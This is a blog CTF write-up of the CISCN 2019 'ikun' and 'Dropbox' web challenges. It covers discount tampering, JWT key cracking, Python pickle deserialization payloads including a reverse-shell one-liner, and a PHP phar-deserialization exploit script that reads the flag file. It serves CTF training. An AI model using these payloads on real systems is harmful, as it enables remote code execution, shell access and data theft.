8-7日刷题

最新推荐文章于 2023-01-05 16:00:27 发布
最新推荐文章于 2023-01-05 16:00:27 发布
阅读量386 收藏
点赞数
分类专栏: ctfweb buuctf刷题记录 文章标签: php python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Realiy/article/details/107866490
版权

贴一个phar的学习文章

[ciscn2019 华北赛区 day1 web2]ikun

知识点:逻辑漏洞,jwt,python反序列化

这题本来是在buuctf做的,后来buuctf维护,然后就在攻防世界做了

打开题目看到一定要买到lv6,随手翻页,看到如图,那么要找到lv6.png,写个脚本来找快一点。

import requests as res

url='http://8110e838-75a9-4a2f-8b80-38b3680ba32c.node3.buuoj.cn/shop?page='

for i in range(1,1000):
    r=res.get(url+str(i))
    if 'lv6.png' in r.text:
        print(i)
        break

找到是在181页,购买的话需要登录,随意注册一个账号就行了(但不要注册admin账号,其他都可以)

点进去是直接购买

点购买的话是加入购物车,有折扣

点结算发现请求包里discount即折扣,那么我们直接改成0.000000001就可以成功购买了

之后发现只允许admin访问

有个jwt,这里用到了一个工具c-jwt-cracker

使用解密工具解出密钥

是"1Kun",拿到jwt官网合成一下jwt

进去之后看到有个www.zip备份,下载下来

一堆python文件,在admin.py中 存在反序列化漏洞

import tornado.web
from sshop.base import BaseHandler
import pickle
import urllib


class AdminHandler(BaseHandler):
    @tornado.web.authenticated
    def get(self, *args, **kwargs):
        if self.current_user == "admin":
            return self.render('form.html', res='This is Black Technology!', member=0)
        else:
            return self.render('no_ass.html')

    @tornado.web.authenticated
    def post(self, *args, **kwargs):
        try:
            become = self.get_argument('become')
            p = pickle.loads(urllib.unquote(become))
            return self.render('form.html', res=p, member=1)
        except:
            return self.render('form.html', res='This is Black Technology!', member=0)

因为引入了pickle函数,所以存在反序列化漏洞的可能性,可以构造__reduce__的魔术方法来执行命令

贴上成功的代码,这里简要说一下,pickle.dumps是序列化,pickle.loads是反序列化.

import pickle
import urllib

class payload(object):
    def __reduce__(self):
        return (eval,("__import__('os').popen('ls /').read()",))
a=pickle.dumps(payload())
#print(a)
a=urllib.quote(a)
print(a)

将得到的值改到become里传过去就可以了

这里还可以

 return (eval,("__import__('os').listdir('/')",))

而这里system('ls /')不行是因为他不能通过return返回查询结果,同理popen('ls /')也不行,但是popen().read()就可以返回查询结果。之后cat /flag.txt就可以了。

当然这题也可以通过命令执行反弹shell

不过比较麻烦,这里贴上代码,因为靶机不能访问外网我也没有再试了,buuctf里面的的话可以开个靶机来用,xctf好像没有这个功能。


#python2
import pickle
import urllib
import os
​class exp(object):    
    def __reduce__(self):        
        s="""python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((ip,port));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' """        
        return os.system, (s,)​
e=exp()
poc = pickle.dumps(e)
print urllib.quote(poc)

[CISCN2019 华北赛区 Day1 Web1]Dropbox

随意注册一个账号登录进去,是文件上传,随意上传一个

尝试上传木马文件,发现怎么修改都上传不了,试试其他功能

下载试试尝试抓包修改读取,读取passwd文件成功,试试读取源码

最后发现在上两层目录

index.php

<?php
session_start();
if (!isset($_SESSION['login'])) {
    header("Location: login.php");
    die();
}
?>


<!DOCTYPE html>
<html>

<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
<title>网盘管理</title>

<head>
    <link href="static/css/bootstrap.min.css" rel="stylesheet">
    <link href="static/css/panel.css" rel="stylesheet">
    <script src="static/js/jquery.min.js"></script>
    <script src="static/js/bootstrap.bundle.min.js"></script>
    <script src="static/js/toast.js"></script>
    <script src="static/js/panel.js"></script>
</head>

<body>
    <nav aria-label="breadcrumb">
    <ol class="breadcrumb">
        <li class="breadcrumb-item active">管理面板</li>
        <li class="breadcrumb-item active"><label for="fileInput" class="fileLabel">上传文件</label></li>
        <li class="active ml-auto"><a href="#">你好 <?php echo $_SESSION['username']?></a></li>
    </ol>
</nav>
<input type="file" id="fileInput" class="hidden">
<div class="top" id="toast-container"></div>

<?php
include "class.php";

$a = new FileList($_SESSION['sandbox']);
$a->Name();
$a->Size();
?>

包含class.php读取一下

<?php
error_reporting(0);
$dbaddr = "127.0.0.1";
$dbuser = "root";
$dbpass = "root";
$dbname = "dropbox";
$db = new mysqli($dbaddr, $dbuser, $dbpass, $dbname);

class User {
    public $db;

    public function __construct() {
        global $db;
        $this->db = $db;
    }

    public function user_exist($username) {
        $stmt = $this->db->prepare("SELECT `username` FROM `users` WHERE `username` = ? LIMIT 1;");
        $stmt->bind_param("s", $username);
        $stmt->execute();
        $stmt->store_result();
        $count = $stmt->num_rows;
        if ($count === 0) {
            return false;
        }
        return true;
    }

    public function add_user($username, $password) {
        if ($this->user_exist($username)) {
            return false;
        }
        $password = sha1($password . "SiAchGHmFx");
        $stmt = $this->db->prepare("INSERT INTO `users` (`id`, `username`, `password`) VALUES (NULL, ?, ?);");
        $stmt->bind_param("ss", $username, $password);
        $stmt->execute();
        return true;
    }

    public function verify_user($username, $password) {
        if (!$this->user_exist($username)) {
            return false;
        }
        $password = sha1($password . "SiAchGHmFx");
        $stmt = $this->db->prepare("SELECT `password` FROM `users` WHERE `username` = ?;");
        $stmt->bind_param("s", $username);
        $stmt->execute();
        $stmt->bind_result($expect);
        $stmt->fetch();
        if (isset($expect) && $expect === $password) {
            return true;
        }
        return false;
    }

    public function __destruct() {
        $this->db->close();
    }
}

class FileList {
    private $files;
    private $results;
    private $funcs;

    public function __construct($path) {
        $this->files = array();
        $this->results = array();
        $this->funcs = array();
        $filenames = scandir($path);

        $key = array_search(".", $filenames);
        unset($filenames[$key]);
        $key = array_search("..", $filenames);
        unset($filenames[$key]);

        foreach ($filenames as $filename) {
            $file = new File();
            $file->open($path . $filename);
            array_push($this->files, $file);
            $this->results[$file->name()] = array();
        }
    }

    public function __call($func, $args) {
        array_push($this->funcs, $func);
        foreach ($this->files as $file) {
            $this->results[$file->name()][$func] = $file->$func();
        }
    }

    public function __destruct() {
        $table = '<div id="container" class="container"><div class="table-responsive"><table id="table" class="table table-bordered table-hover sm-font">';
        $table .= '<thead><tr>';
        foreach ($this->funcs as $func) {
            $table .= '<th scope="col" class="text-center">' . htmlentities($func) . '</th>';
        }
        $table .= '<th scope="col" class="text-center">Opt</th>';
        $table .= '</thead><tbody>';
        foreach ($this->results as $filename => $result) {
            $table .= '<tr>';
            foreach ($result as $func => $value) {
                $table .= '<td class="text-center">' . htmlentities($value) . '</td>';
            }
            $table .= '<td class="text-center" filename="' . htmlentities($filename) . '"><a href="#" class="download">下载</a> / <a href="#" class="delete">删除</a></td>';
            $table .= '</tr>';
        }
        echo $table;
    }
}

class File {
    public $filename;

    public function open($filename) {
        $this->filename = $filename;
        if (file_exists($filename) && !is_dir($filename)) {
            return true;
        } else {
            return false;
        }
    }

    public function name() {
        return basename($this->filename);
    }

    public function size() {
        $size = filesize($this->filename);
        $units = array(' B', ' KB', ' MB', ' GB', ' TB');
        for ($i = 0; $size >= 1024 && $i < 4; $i++) $size /= 1024;
        return round($size, 2).$units[$i];
    }

    public function detele() {
        unlink($this->filename);
    }

    public function close() {
        return file_get_contents($this->filename);
    }
}
?>

再读取其他的

upload.php

<?php
session_start();
if (!isset($_SESSION['login'])) {
    header("Location: login.php");
    die();
}

include "class.php";

if (isset($_FILES["file"])) {
    $filename = $_FILES["file"]["name"];
    $pos = strrpos($filename, ".");
    if ($pos !== false) {
        $filename = substr($filename, 0, $pos);
    }
    
    $fileext = ".gif";
    switch ($_FILES["file"]["type"]) {
        case 'image/gif':
            $fileext = ".gif";
            break;
        case 'image/jpeg':
            $fileext = ".jpg";
            break;
        case 'image/png':
            $fileext = ".png";
            break;
        default:
            $response = array("success" => false, "error" => "Only gif/jpg/png allowed");
            Header("Content-type: application/json");
            echo json_encode($response);
            die();
    }

    if (strlen($filename) < 40 && strlen($filename) !== 0) {
        $dst = $_SESSION['sandbox'] . $filename . $fileext;
        move_uploaded_file($_FILES["file"]["tmp_name"], $dst);
        $response = array("success" => true, "error" => "");
        Header("Content-type: application/json");
        echo json_encode($response);
    } else {
        $response = array("success" => false, "error" => "Invaild filename");
        Header("Content-type: application/json");
        echo json_encode($response);
    }
}
?>

download.php,在download.php里面发现不允许读取含flag的文件,说明可能存放flag.php|.txt等

<?php
session_start();
if (!isset($_SESSION['login'])) {
    header("Location: login.php");
    die();
}

if (!isset($_POST['filename'])) {
    die();
}

include "class.php";
ini_set("open_basedir", getcwd() . ":/etc:/tmp");

chdir($_SESSION['sandbox']);
$file = new File();
$filename = (string) $_POST['filename'];
if (strlen($filename) < 40 && $file->open($filename) && stristr($filename, "flag") === false) {
    Header("Content-type: application/octet-stream");
    Header("Content-Disposition: attachment; filename=" . basename($filename));
    echo $file->close();
} else {
    echo "File not exist";
}
?>

delete.php

<?php
session_start();
if (!isset($_SESSION['login'])) {
    header("Location: login.php");
    die();
}

if (!isset($_POST['filename'])) {
    die();
}

include "class.php";

chdir($_SESSION['sandbox']);
$file = new File();
$filename = (string) $_POST['filename'];
if (strlen($filename) < 40 && $file->open($filename)) {
    $file->detele();
    Header("Content-type: application/json");
    $response = array("success" => true, "error" => "");
    echo json_encode($response);
} else {
    Header("Content-type: application/json");
    $response = array("success" => false, "error" => "File not exist");
    echo json_encode($response);
}
?>

接下来就是漫长的代码审计过程

  1. download.php里有ini_set("open_basedir", getcwd() . ":/etc:/tmp");限制了只有在当前目录(getcwd返回当前目录)和/etc,/tmp里访问,而delete.php里没有,所以后面利用要在delete.php里利用。
  2. function _call($func,$args)魔术方法:会在对象调用的方法不存在时,自动执行。 $func:被调用的方法名,所以$func()在这个魔术方法中,可以表示被调用的那个方法; $args : 被调用方法中的参数(这是个数组)。用于遍历上传的文件并将信息存储。
  3. phar序列化,当生成phar可将对象序列化存储,而且是靠文件头来读取的,即使生成之后修改后缀名,也能识别,而使用phar://伪协议读取时,能够反序列化。利用条件:
    1. phar文件要能上传到服务端,如file_exists()fopen()file_get_contents()file()等文件操作的函数
    2. 要有可用的魔术方法作为跳板
    3. 文件操作函数的参数可控,且没有过滤":、/、phar"等特殊字符

 

下面贴出一个成功的利用脚本:

<?php

class User {
	    public $db;
}

class File {
	    public $filename;
}
class FileList {
	    private $files;
	        private $results;
	        private $funcs;

		    public function __construct() {
			            $file = new File();
				            $file->filename = '/flag.txt';
				            $this->files = array($file);
					            $this->results = array();
					            $this->funcs = array();
						        }
}

@unlink("./phar.phar");
$phar = new Phar("./phar.phar"); //后缀名必须为phar

$phar->startBuffering();

$phar->setStub("<?php __HALT_COMPILER(); ?>"); //设置stub

$o = new User();
$o->db = new FileList();

$phar->setMetadata($o); //将自定义的meta-data存入manifest
$phar->addFromString("exp.txt", "test"); //添加要压缩的文件
//签名自动计算
$phar->stopBuffering();

?>

将生成文件后缀改为jpg,然后上传之后删除是抓包,改为phar://phar.jpg就得到了flag

ta3shi
关注
专栏目录
8月8刷题
Realiy的博客
08-08 400
[网鼎杯 2020 朱雀组]phpweb f12发现有post数据 hackbar看一下 是call_user_func()函数,用file_get_contents读取一下index.php <?php $disable_fun = array("exec","shell_exec","system","passthru","proc_open","show_source","phpinfo","popen","dl","eval","proc_terminate",
C语言学习笔记(七)---一些刷题记录
passer_by_A的博客
10-30 1319
最近在学校的oj上做了一些题目,都不是很难,今天本想统一写一下题解但时间太晚,篇幅太长,于是先写三道比较基础的。
php 静态方法 call,PHP魔术方法之__call与__callStatic使用方法
weixin_29840657的博客
03-10 150
核心代码//魔术方法__call/*$method 获得方法名$arg 获得方法的参数集合*/class Human {private function t(){}public function __call($method,$arg){echo '你想调用我不存在的方法',$method,'方法';echo '还传了一个参数';echo print_r($arg),'';}public stat...
NO.3-5 [CISCN2019 华北赛区 Day1 Web1]Dropbox
nigo134的博客
08-06 316
知识点轰炸 1.1 open_basedir 在in_set这个函数中,可以设置php的一些配置,其中就包括open_basedir ,用来限制当前程序可以访问的目录。后来问了一下朱师傅,了解到:它是可以访问设置目录下的所有下级目录。 若"open_basedir = /dir/user", 那么目录 “/dir/user” 和 “/dir/other"都是可以访问的。所以如果要将访问限制在仅为指定的目录,请用斜线结束路径名。”."可代表当前目录,open_basedir也可以同时设置多个目录,在Win
关于网站后台攻防技术的深入研究(刚进来就看到的文章)
jindg1980的博客
04-26 691
今天给大家带来一个简单的网站后台入侵的方法,大家可以去试试,若成功入侵了,也请各位不要搞破坏,本教程纯属提供一种方式给大家互相学习交流。 步骤如下: 1.打开浏览器:这里我使用的是360浏览器。 2.百度搜索inurl:szwyadmin/login.asp  出来下面的界面: 3.出来的就是一些网站的后台登录的网址。这里我随意选一个点击进入: 这里我选的是第二个
CISCN 2019-ikun
怪味巧克力的博客
06-15 752
0x01 进去网址,页面如下: 刚开始有个登陆和注册的按钮,上图是我已经注册后登陆成功后的页面,我们发现在图的左下角给了一个关键的提示,购买LV6,通过寻找我们发现页面数很多,大概500页,一个一个找不上办法,所以我们用脚本去寻找LV6所在页面,脚本如下: import requests r = requests.session() url = "http://220.249.52.133:52610/shop?page=" for i in range(0,1000): re = r.get(
leetcode卡-LeetCode-solution:LeetCode刷题打卡
07-06
leetcode卡 LeetCode-solution LeetCode刷题打卡—监督自己!不懂的代码Debug一遍 Day1: 2021年5月31 Day2: 2021年6月1 Day3: 2021年6月2 Day4: ...Day8: 2021年6月7 ...2021年6月8 ...2021年7月7
2023 CPA 会计-存货【刷题】【2023-1-6完结】
最新发布
Mr.Xia 先生
01-05 291
CPA存货
leetcode中325题python-leetcode:leetcode刷题
06-30
leetcode中325题python ...8月7 734 相似句子判断 map与set应用 done 737 具有传递性的句子判断 graph实现,或并查集实现 done 684 冗余连接 done 8月8 547 朋友圈 done 8月9 207 done 210 拓扑排序 do
leetcode题库-LeetCode:LeetCode刷题仓库
06-29
2018年5月20时,该项目的创建者设定目标要在年底前通过刷题来获得LeetCode商城的“全家桶”奖励,这通常意味着完成大量的LeetCode题目。 在LeetCode上,你可以找到各种难度级别的问题,涵盖数据结构、算法、设计...
[CISCN2019 华北赛区 Day1 Web1]Dropbox
沐目的博客
10-31 6837
知识点轰炸 1.1 open_basedir 在in_set这个函数中,可以设置php的一些配置,其中就包括open_basedir ,用来限制当前程序可以访问的目录。后来问了一下朱师傅,了解到:它是可以访问设置目录下的所有下级目录。 若"open_basedir = /dir/user", 那么目录 “/dir/user” 和 “/dir/other"都是可以访问的。所以如果要将访问限制在仅为指...
PHP反序列化
BrosyveryOK的博客
11-08 3850
前人栽树,后人乘凉。
一天一道ctf 第41天(JWT python序列化pickle)
scrawman的博客
07-22 525
[BSidesCF 2019]Futurella 一开始看题目觉得还挺有意思的,结果查看源代码就能得到flag???这真是我做过最简单的题目了。 [CISCN2019 华北赛区 Day1 Web2]ikun 作者也是老阴阳人了,紧跟时事, 目标是要买到lv6,但是连续看几页都没有lv6,那就写一个脚本搜索一下,在第181页找到lv6,但是买不起啊。 import requests url="http://dea21ab8-0a31-4781-8f0b-7d5285a017c0.node4.buuoj.
ciscn2019华北赛区半决赛day1_web1题解
weixin_30776273的博客
08-07 464
感谢buuoj的大佬们搭建的复现环境。作为一位CTF的初学者,我会把每个题目的writeup都写的尽量详细,希望能帮到后面的初学者。 http://web42.buuoj.cn 文章会不定时继续完善,完善内容可能包括分析的错误、语病和文章结构等。 复现过程 进入解题页面发现需要登录,这里只需要注册一个账号然后登录即可。 登录以后是一个网盘的页面,最开始只有上传功能,并且只能上传pn...
ctf学习笔记1——bugku刷题
Xlider的博客
01-24 364
ctf新手入门,开始刷bugku的题目,记录一下学到的知识 2021-1-22 使用chrome按F12即可进入开发者模式,可以看到前端源码,并且可以修改 浏览器地址栏后直接加?aaa=bbb,可以使用get方法发送参数,参数名为aaa,值为bbb 如果要用post方法发送数据,可以使用以前做测试的时候用过的postman,postman功能还是挺强大的 php中==符号不能判断类型,在数字与字符串比较时会将字符串转化为数字进行比较,因此如果输入1b,则会将其直接转为1来进行比较 $GLOBAL
php 魔术方法 __call
苦艾文艺
08-22 868
__call     PHP5 的对象新增了一个专用方法 __call(),这个方法用来监视一个对象中的其它方法。如果你试着调用一个对象中不存在的方法,__call 方法将会被自动调用。    For example:     class Father{   public function test(){   echo "this is a test function";   }  
BUUCTF复现记录2
baochigu0818的博客
08-22 303
[CISCN2019 华北赛区 Day1 Web1]Dropbox 打开题目,一个登录界面,SQL? sqlmap跑一下,没有注入,那么注册一下 登录之后,发现只有一个上传页面,源码里面也没有什么 那就上传看看吧,只能上传图片格式的 上传一个试试 上传之后,发现有下载和删除选项,下载抓包看看。 在下载文件存在任意文件下载漏洞 在index.php里面看到包含...
8-14刷题php反序列化,Smarty ssti,json命令执行)
Realiy的博客
08-14 970
[NPUCTF2020]ReadlezPHP 找到time.php?source,打开的得到time.php的源码 <?php #error_reporting(0); class HelloPhp { public $a; public $b; public function __construct(){ $this->a = "Y-m-d h:i:s"; $this->b = "date"; } publ
宫水三叶的刷题记:背包DP实战指南
3. 资源获取:合集的最新内容更新于2021年10月7,每2-4周更新一次,可以通过关注公众号并回复「背包DP」获取最新下载链接。 4. 最佳实践: - 算法学习:首先访问Github或Gitee版本的在线目录,利用侧边栏的类别...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值